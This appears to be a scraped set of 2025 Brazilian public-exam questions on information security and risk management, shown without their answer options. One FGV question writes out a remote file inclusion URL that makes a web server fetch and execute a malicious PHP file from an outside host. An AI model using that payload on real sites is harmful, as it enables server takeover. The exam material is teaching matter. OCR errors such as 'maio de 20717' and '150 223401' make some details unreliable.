Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos ISO 27002
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
Karen é funcionária pública do Ministério Público da União (MPU) e foi designada para determinar e implementar controles de acordo com a Norma ABNT NBR ISO/IEC 27002:2022 para tratamento de riscos de segurança da informação em um sistema de gestão de segurança da informação (SGSI) do MPU, baseado na ABNT NBR ISO/IEC 27001. Entretanto, para iniciar esse processo, Karen precisará determinar, junto com a organização, os requisitos de segurança necessários para atender a demanda do MPU.
Para identificar esses requisitos, as principais fontes de requisitos, segundo a Norma ABNT NBR ISO/IEC 27002:2022, observadas por Karen, são:
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: FCPC
No gerenciamento de riscos, qual das opções abaixo exemplifica uma estratégia de mitigação de risco?
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: Fundação Getúlio Vargas (FGV)
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar ...
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: Avança SP
No contexto de segurança web, qual vulnerabilidade permite a execução de scripts maliciosos no navegador do usuário?
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: IDESG
Etapa da gestão de riscos em que os riscos identificados passam por uma avaliação pormenorizadamente, para compreender sua origem e natureza, probabilidade de ocorrência e impacto potencial, assim como é realizada a priorização dos riscos com base nas consequências do seu impacto e na probabilidade de ocorrência. O texto fala de qual etapa da gestão de riscos?
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: IDESG
Ação adotada na Gestão de Segurança da Informação (GSI) que visa identificar, avaliar e mitigar os riscos relacionados à segurança da informação. Esta ação pode adotar a análise de vulnerabilidades e ameaças internas e externas, buscando evitar problemas previamente para não reverberar em problemas mais graves no futuro. Qual o nome desta ação adotada na GSI?
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: Fundação CETAP
Analise as afirmativas a seguir sobre a técnica de port Scanning:

I - O port scanning é uma técnica utilizada em testes de segurança e por atacantes para identificar portas abertas e vulnerabilidades em um sistema.
|l - Ao executar o port scan em um sistema e encontrando vulnerabilidade em algum servigo aberto é possível bloquear coexões na(s) porta(s) deste serviço.
lll — Através de ferramentas de port scan é possível realizar uma autenticação em múltiplos serviços de rede para verificar se as credenciais são validas.

Qual(is) afirmativa(s) esta(ao) correta(s)? 
Segurança da Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: FUNDATEC Processos Seletivos (FUNDATEC)
A gestão da segurança da informação e seus riscos envolve uma _________ de gestão de risco, na qual é importante distinguir entre os conceitos de identificar riscos e gerenciar riscos. Nesse contexto, são abordados os incidentes de segurança da informação, que são eventos adversos que podem comprometer a segurança da informação, resultando na _________ de um ou mais dos seus princípios fundamentais: confidencialidade, integridade, ____________ e não repúdio.

Assinale a alternativa que preenche, correta e respectivamente, as lacunas do trecho acima.
Segurança da Informação Políticas de Segurança de Informação Análise de Vulnerabilidade e Gestão de Riscos Plano de Continuidade de Negócios + 2
Ano: 2025
Banca: Fundação Carlos Chagas (FCC)
Considere a notícia a seguir:

Em maio de 20717, o Serviço Nacional de Saúde (NHS) do Reino Unido foi severamente afetado pelo ransomware WannalCry. O ataque criptografou dados e exigiu resgates para liberar os sistemas, causando a interrupção de serviços em mais de um terço dos hospitais do NHS. Milhares de consultas e cirurgias foram canceladas, resultando em custos financeiros significativos.

Como integrante da equipe de analistas da área de saúde de uma Prefeitura Municipal, ao analisar o caso acima descrito, considerando a aplicação da 150 223401 e visando a segurança dos dados do órgão, conclui-se que o impacto do ataque poderia ter sido minimizado ou até evitado se o órgão tivesse 
Segurança da Informação Políticas de Segurança de Informação Análise de Vulnerabilidade e Gestão de Riscos
Ano: 2025
Banca: Fundação Carlos Chagas (FCC)
Para defender uma Prefeitura contra ataques cibernéticos, uma Analista decidiu executar ações aplicando o princípio de “nunca confiar, sempre verificar”, visando proteger os dados sensíveis dos cidadãos e garantir a continuidade dos serviços públicos, mediante a implementação